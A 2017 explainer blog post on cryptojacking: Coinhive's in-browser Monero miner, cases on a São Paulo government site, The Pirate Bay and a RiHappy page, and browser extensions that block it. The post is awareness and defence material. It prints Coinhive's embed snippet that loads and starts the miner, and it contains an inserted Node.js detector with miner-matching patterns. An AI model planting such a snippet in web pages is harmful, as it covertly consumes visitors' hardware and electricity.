
Cryptojacking of processing power: what is it and how to protect yourself?

Written by

11 December 2017

Most website admins have always tried to profit through their pages, one way or another, for various reasons: whether to make an actual profit or simply to keep the site online. This has been done through direct advertising, adware, spyware, sponsored posts and premium content. Now that innovations such as cryptocurrencies are gaining momentum, admins have found another way to profit from users and their visits: using their processing power to mine cryptocurrency.

This novel practice has been called “cryptojacking” and has been used both as a form of cyberattack and as an alternative means for admins to profit from their websites. Some notable examples, explained at the end, include government websites, the Pirate Bay, the UFC website, MBL’s Jornalivre and many others, with various ends. The practice basically hijacks the computing power of a user’s computer or graphics card to mine cryptocurrencies for a third party, in many cases unknown. It has been called “cryptojacking” because it requires a lot of computing and processing power in order to slowly mine a new coin. Cryptocurrency mining is done by solving several highly complex mathematical problems, which then reward those who contributed their processing power with a proportional amount of a certain cryptocurrency.

Even though it has not yet been practiced on a large scale, it raises concerns and demands attention since, according to certain tests by users, the extra processing power required takes its toll on the user’s hardware and electricity bill.

How does it happen and when did it begin?

It all started when a company called Coinhive created code that pools the processing power of many different computers in order to mine cryptocurrency. It advertised itself as a new way of profiting from websites by implementing a script which forces users’ computers to mine cryptocurrency, sharing the results between Coinhive and the website owner. Its software mines Monero, which is easier to mine than Bitcoin.

The company’s website shows its business plan, the code used and the products it offers: hijacking through captchas, shortened URLs or simply by accessing the website. It takes only a few lines of code, such as the following, which can be easily spotted in a page’s source code:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('<site-key>', 'john-doe');
miner.start();
</script>
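The check described above (spotting the script in a page's source), as an added example that is not part of the original post or Coinhive's own code: a small Node.js function that scans HTML for the loader tag and the `CoinHive` constructor shown in the snippet. The function names and both sample pages are constructed for illustration, and matching a self-hosted copy by file name is an assumption.

```javascript
// Added example: flag Coinhive-style miner loaders in page source.
// SAMPLE_PAGE and CLEAN_PAGE are constructed; '<site-key>' is the page's placeholder.
const SAMPLE_PAGE = `<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('<site-key>', 'john-doe');
miner.start();
</script>
</head><body><p>Welcome</p></body></html>`;

const CLEAN_PAGE = `<html><head><script src="/static/app.js"></script></head>
<body><p>An article that mentions coinhive.com in plain text.</p></body></html>`;

// Normalise typographic quotes so markup mangled by a CMS or copy/paste still matches.
function normalizeQuotes(s) {
  return s.replace(/[\u201C\u201D]/g, '"').replace(/[\u2018\u2019]/g, "'");
}

// Assumption: a self-hosted copy keeps the library's file name.
function isMinerUrl(url) {
  const onVendorHost = /(^|\/\/)(?:[\w-]+\.)*coinhive\.com\//i.test(url);
  const vendorFileName = /coinhive(\.min)?\.js(\?|$)/i.test(url);
  return onVendorHost || vendorFileName;
}

function findMinerIndicators(html) {
  const src = normalizeQuotes(html);
  const findings = [];
  // 1. External loader: only URLs inside <script src=...> count, not body text.
  const scriptSrc = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  for (const m of src.matchAll(scriptSrc)) {
    if (isMinerUrl(m[1])) findings.push({ type: 'loader', value: m[1] });
  }
  // 2. Inline start-up code: new CoinHive.<Kind>('<site-key>', ...).
  //    The site key identifies the account that is credited with the hashes.
  const ctor = /new\s+CoinHive\.(\w+)\s*\(\s*["']([^"']*)["']/g;
  for (const m of src.matchAll(ctor)) {
    findings.push({ type: 'constructor', value: m[1], siteKey: m[2] });
  }
  return findings;
}

console.log(findMinerIndicators(SAMPLE_PAGE));
console.log(findMinerIndicators(CLEAN_PAGE));
```

Recording the site key alongside the finding helps an administrator who did not add the script tell which account was collecting the mining proceeds.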

When activated, the script kidnaps all the hardware’s processing power, depleting the battery much faster and making the computer slower and more energy-consuming.

Example of a script running on an i5, 2.6 GHz computer

Website admins get a dashboard with all the information concerning the mining operation, and are able to follow the mining rate, how much they are profiting and the total hash number.

Admin’s dashboard on a website utilizing Coinhive

This way, Coinhive’s business model is quite complete, complex and worrisome: it offers admins total control over the hijacking of processing power, charges a fee and advertises itself as a way of reducing advertisement on the Internet.

Recent and notable cases

The State of São Paulo government’s Cidadão.sp website

Google’s lawyer, Felipe Hoffa, denounced on Twitter that a website run by the government of the State of São Paulo was using Coinhive to hijack processing power from its users:

Coinhive script detected in São Paulo government’s Cidadão.sp website


After the complaint, the government declared it hadn’t used the tool and removed the script from its website.

Piratebay.org

The famous torrent tracker website was using a JavaScript script by Coinhive. The implementation was made in an intentional and declared manner by the Pirate Bay team, as a test of a new way of creating income.

Process graphic accessing The Pirate Bay website

RiHappy’s Christmas Website

The retail toy store was also denounced on Twitter, and the company made no statement. The script was operating hidden on the www.umacasadenatal.rihappy.com.br website and was removed after complaints by users.

Coinhive script detected in Ri Happy Christmas website

How to protect yourself?

Technology can bring several conveniences to our lives, but it also brings certain barriers which must be fought against by all of society. Here are some ways of protecting yourself against such schemes:

No Coin

No Coin is an open source extension created by Swiss programmer Rafael Keramidas and is available on Chrome, Firefox and Opera’s extension stores. It is easy to use and install and requires no previous registration.

No Coin at Chrome Web Store

Script Blocker

Script Blocker is an extension which blocks the execution of any script while active. It is also available on Chrome and Firefox’s stores.

Script Blocker at Chrome Web Store

Tor

Tor is an anonymous, safe and privacy-ensuring browser which doesn’t allow scripts to be run automatically.

Tor browser logo


Now you know what cryptojacking is, how it works and how to protect yourself. It is important for everyone to raise awareness of the issue, so it may be brought to discussion before it becomes a norm rather than an exception, causing great disturbance in many users’ lives. What are you waiting for? Protect yourself and share it with your friends!

The views and opinions expressed in this article are those of the authors and do not necessarily reflect the official policy or position of the Institute for Research on Internet and Society.

Written by

Law bachelor in the Federal University of Minas Gerais and graduated from the Federal Institute of Minas Gerais (IFMG). Composed the coordinating team of GNET – Group of International Studies of Intellectual Property, Internet and Innovation in the year of 2017.

Davi worked as a researcher at the Institute of Reference in Internet and Society (IRIS) and researcher founder in the research group DTI – Law, Technology and Innovation. Worked as a jr consultant at Alexandre Atheniense office in digital corporate compliance services in hospital networks.

Alumni of the Internet Governance School of the Internet Governance and a fellow at the Youth @IGF (2017) program of the Internet Governance Committee in Brazil (CGI.br) to participate in the 12th Internet Governance Forum in Palace of Nations in Switzerland.
